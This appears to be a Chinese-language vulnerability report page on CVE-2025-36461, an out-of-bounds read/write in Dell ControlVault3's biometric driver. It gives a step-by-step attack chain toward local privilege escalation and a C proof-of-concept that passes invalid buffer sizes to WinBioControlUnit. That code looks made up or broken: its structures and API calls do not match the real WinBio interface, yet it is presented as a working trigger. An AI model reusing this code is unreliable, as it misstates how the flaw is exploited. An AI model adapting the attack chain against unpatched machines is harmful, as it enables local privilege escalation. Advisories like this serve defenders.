IPBUF安全漏洞报告
English
CVE-2025-36461 CVSS 7.3 高危

CVE-2025-36461 Dell ControlVault3越界读写漏洞

披露日期: 2025-11-17
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-36461
漏洞类型
越界读写/内存损坏
CVSS评分
7.3 高危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Dell ControlVault3, Dell ControlVault3 Plus

相关标签

越界读写内存损坏Dell ControlVault本地提权WinBioBroadcom Storage AdapterCVE-2025-36461

漏洞概述

CVE-2025-36461是Dell ControlVault WBDI驱动中的一个高危安全漏洞,CVSS评分7.3。该漏洞存在于Broadcom Storage Adapter功能中,影响ControlVault3 5.15.14.19之前版本及ControlVault3 Plus 6.2.36.47之前版本。攻击者可通过构造特殊的WinBioControlUnit调用触发越界读写,导致内存损坏。攻击需要低权限用户权限和用户交互,但由于机密性、完整性和可用性影响均为高,因此被评定为高危漏洞。该漏洞由Cisco Talos威胁情报团队发现并报告。

技术细节

该漏洞为多个越界读写(Out-of-bounds read/write)问题,存在于Dell ControlVault WBDI驱动的Broadcom Storage Adapter组件中。漏洞触发条件为:向StorageAdapter提交WinBioControlUnit调用时,使用ControlCode为0(WBIO_USH_GET_TEMPLATE),同时提供无效的ReceiveBufferSize和/或无效的SendBufferSize参数。由于驱动在处理这些参数时缺乏适当的边界检查,导致可以访问或写入预期的缓冲区边界之外的内存区域,从而引发内存损坏。攻击者可通过调用相关API接口触发此漏洞,实现本地权限提升或信息泄露。

攻击链分析

STEP 1
步骤1
攻击者获得目标系统的低权限用户访问权限
STEP 2
步骤2
攻击者识别系统上安装的Dell ControlVault3驱动版本
STEP 3
步骤3
攻击者构造包含无效ReceiveBufferSize和SendBufferSize参数的WinBioControlUnit调用
STEP 4
步骤4
使用ControlCode 0 (WBIO_USH_GET_TEMPLATE)针对Broadcom Storage Adapter发送恶意请求
STEP 5
步骤5
驱动因缺乏边界检查而执行越界内存读写操作
STEP 6
步骤6
攻击者利用内存损坏实现权限提升或敏感信息泄露

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// CVE-2025-36461 PoC - Dell ControlVault WBDI Driver Out-of-Bounds Access // Trigger via WinBioControlUnit with invalid buffer sizes #include <windows.h> #include <winbio.h> #include <winbio_types.h> #include <winbio_err.h> #pragma comment(lib, "winbio.lib") int main() { WINBIO_SESSION_HANDLE sessionHandle = NULL; WINBIO_UNIT_ID unitId = 0; HRESULT hr = S_OK; // Initialize WINBIO session hr = WinBioOpenSession( WINBIO_TYPE_FINGERPRINT, WINBIO_POOL_SYSTEM, WINBIO_SESSION_FLAG_DEFAULT, NULL, 0, WINBIO_DB_DEFAULT, &sessionHandle ); if (FAILED(hr)) { printf("WinBioOpenSession failed: 0x%x\n", hr); return hr; } // Find ControlVault device hr = WinBioEnumServiceProviders( WINBIO_TYPE_FINGERPRINT, WINBIO_FLAG_DEFAULT, NULL, &unitId ); // Trigger vulnerability with ControlCode 0 and invalid buffer sizes // WBIO_USH_GET_TEMPLATE with malformed ReceiveBufferSize/SendBufferSize WINBIO_CONTROL_PARAMETERS controlParams = {0}; WINBIO_CONTROL_DATA controlData = {0}; controlParams.ParameterType = WINBIO_PARAMETER_TYPE_BUFFER; controlParams.ControlCode = 0; // WBIO_USH_GET_TEMPLATE controlParams.ReceiveBufferSize = 0xFFFFFFFF; // Invalid size controlParams.SendBufferSize = 0xFFFFFFFF; // Invalid size hr = WinBioControlUnit( sessionHandle, unitId, WINBIO_STORAGE_ADAPTER, // Broadcom Storage Adapter &controlParams, &controlData ); if (SUCCEEDED(hr) || hr == WINBIO_E_INVALID_BUFFER_SIZE) { printf("Vulnerability triggered - potential out-of-bounds access\n"); } WinBioCloseSession(sessionHandle); WinBioShutdown(); return 0; }

影响范围

Dell ControlVault3 < 5.15.14.19
Dell ControlVault3 Plus < 6.2.36.47

防御指南

临时缓解措施
在官方补丁发布前,可通过禁用Dell ControlVault生物识别功能、限制非管理员用户访问WinBio API、监控系统日志中的异常驱动活动、以及实施最小权限原则来降低风险。建议密切关注Dell官方安全公告,及时应用安全更新。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表